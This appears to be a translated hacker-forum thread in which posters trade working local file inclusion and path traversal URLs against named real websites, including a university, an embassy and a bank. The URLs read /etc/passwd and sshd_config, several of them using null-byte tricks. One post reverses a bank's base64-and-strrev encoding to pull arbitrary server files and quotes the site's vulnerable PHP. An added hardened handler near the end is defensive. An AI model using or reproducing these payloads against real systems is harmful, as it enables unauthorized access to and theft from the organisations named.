[PR 6]
Code:
http://web.ce.metu.edu.tr/index.php?id=../../../index

[PR 6]
Code:
http://www.ipp.mesi.ru/edu/index.php?id=index
Code:
http://www.embavenez-us.org/index.php/function.include?pagina=../../../../../../../../../../../../../../etc/passwd
-----------------------------
fuck owner:)
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd - for some reason it swears rudely here
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd%00
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/ssh/sshd_config%00
Code:
http://www.spaziopetardo.it/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.classicbattletech.com/index.php?action=../../../../../../../../../../../../../etc/passwd%00
http://highwaycompanions.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.velvetrevolver.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.everestkc.net/index.php?module=../../../../../../../../../../../../../etc/passwd%00
Another small batch.
Anti-repost check: Google
Directory:
http://doska42.ru/index.php?rub=news&page=../../../../../../../etc/
File in it:
http://doska42.ru/index.php?rub=newspod&rubnews=../../../../../../../../../..&page=FILENAME
A bank, multibanka.com
It fetches a file, for example:
Code:
http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRhb2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdXRzbGF2XzI9ZW1hbl9lbGlm
Base64! Decode it:
Code:
sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utslav_2=eman_elif
^_^
Code:
file_name=2_valstu_saraksts_2007_ru.pdf;file_path= rus/application/documents/selif_dedaopu
Do it the smart way for /etc/passwd
Code:
/cte/=htap_elif;dwssap=eman_elif
And fetch it
Code:
http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=
That's the kind of cr*p it is.

P.S:
get_file.php
PHP:
include "include_php/my_encoder.php";
// decode_str() copies every key=value pair from the decoded q into $_GET
decode_str( $_GET['q'] );
$file_type = explode('.',$_GET['file_name']);
$file_type = end($file_type);
if(strtolower($file_type)=='pdf') header('Content-type: application/pdf');
//print_r($_GET);
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=". $_GET['file_name']);
header("Content-Transfer-Encoding: binary");
header("Content-Type: application/download");
header("Accept-Ranges: bytes");
header("Content-Length: ". filesize($_GET['file_path']."/".$_GET['file_name']));
// file_path and file_name are used as supplied, with no check on the resulting path
$file = $_GET['file_path']."/".$_GET['file_name'];
$filename = fopen($file,"r");
$data = fread($filename, filesize($file));
fclose($filename);
echo $data;

my_encoder.php
PHP:
// eregi() and split() are PHP 5-era functions (removed in PHP 7)
function encode_str($string) {
    return base64_encode(strrev($string));
}
function decode_str($string) {
    $result = strrev(base64_decode($string));
    // SQL injection tests
    if ((eregi("SELECT", $result)) || (eregi("select", $result)) || (eregi("UNION", $result)) || (eregi("union", $result))) {
        Header("Location: http://www.bs.lv/track_hacker.php");
    }
    // split the decoded string into key=value pairs and write them into $_GET
    $tmp_arr=split(";",$result);
    for ( $i=0; $i<sizeof($tmp_arr); $i++ ) {
        $ta = split("=",$tmp_arr[$i]);
        if ($ta['0']) { $_GET[$ta['0']] = $ta['1']; }
    }
}
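
A hardened counterpart to the get_file.php handler quoted above, as an added example that is not part of the original post or the site's code: the reversible strrev()+base64 encoding is replaced with an HMAC-signed token, and the resolved path must stay under a fixed root. DOWNLOAD_ROOT, TOKEN_KEY, the `t` parameter and the function names are assumptions.

```php
<?php
// Added example, not the site's code. DOWNLOAD_ROOT, TOKEN_KEY, the "t"
// parameter and all function names are assumptions for this sketch.
const DOWNLOAD_ROOT = '/var/www/app/uploaded_files';          // assumed root
const TOKEN_KEY = 'replace-with-random-server-side-secret';   // placeholder

// Token = base64(relative path) . "." . HMAC-SHA256(relative path).
// Unlike strrev()+base64, a client cannot mint a valid token for a new path.
function make_token(string $relPath): string {
    return base64_encode($relPath) . '.' . hash_hmac('sha256', $relPath, TOKEN_KEY);
}

// Return the path carried by a token, or null when the MAC does not verify.
function read_token(string $token): ?string {
    $parts = explode('.', $token, 2);
    if (count($parts) !== 2) return null;
    $relPath = base64_decode($parts[0], true);
    if ($relPath === false) return null;
    $expected = hash_hmac('sha256', $relPath, TOKEN_KEY);
    return hash_equals($expected, $parts[1]) ? $relPath : null;
}

// Map a relative path to an existing PDF strictly below DOWNLOAD_ROOT.
function resolve_download(string $relPath): ?string {
    if (strpos($relPath, "\0") !== false) return null;   // reject NUL bytes
    $root = realpath(DOWNLOAD_ROOT);
    $file = realpath(DOWNLOAD_ROOT . '/' . $relPath);     // collapses ../ and symlinks
    if ($root === false || $file === false || !is_file($file)) return null;
    if (strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) return null;
    if (!preg_match('/^[A-Za-z0-9._-]+\.pdf$/i', basename($file))) return null;
    return $file;
}

// Serve the file only when the token verifies and the path stays in the root.
function serve_download(array $query): void {
    $token = $query['t'] ?? null;
    $relPath = is_string($token) ? read_token($token) : null;
    $file = $relPath === null ? null : resolve_download($relPath);
    if ($file === null) { http_response_code(404); return; }
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Content-Length: ' . filesize($file));
    readfile($file);
}

serve_download($_GET);
```

Links are built server-side with rawurlencode(make_token(...)), since standard base64 output can contain +, / and =.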
http://www.lastminute-music.com/index.php?inc=/etc/passwd
http://www.pubs.org.au/index.php?inc=/etc/passwd
Local include. I couldn't get through to /etc/passwd; the hosting has a filter.
Local include. For some reason I couldn't find /etc/passwd.
Same trouble.
On the forum I only found an SQL injection for this site, so I'll post a PHP injection (LFI).
Code:
http://www.uvm.edu/student_life/?Page=../phpinfo.php
And a little piece from me.
HTML:
http://www.lauralee.com/index.cgi?page=../../../../../../../etc/passwd%00
HTML:
http://www.cats-online.ru/index.cgi?state=article_phsycology&page=../../../../../../../etc/passwd%00
HTML:
http://www.phathack.com/index.cgi?page=../../../../../../../../../../../../../../etc/passwd%00
HTML:
http://www.concordalliance.org/index.cgi?page=../../../../../../../../../../../../../../../../../../etc/passwd%00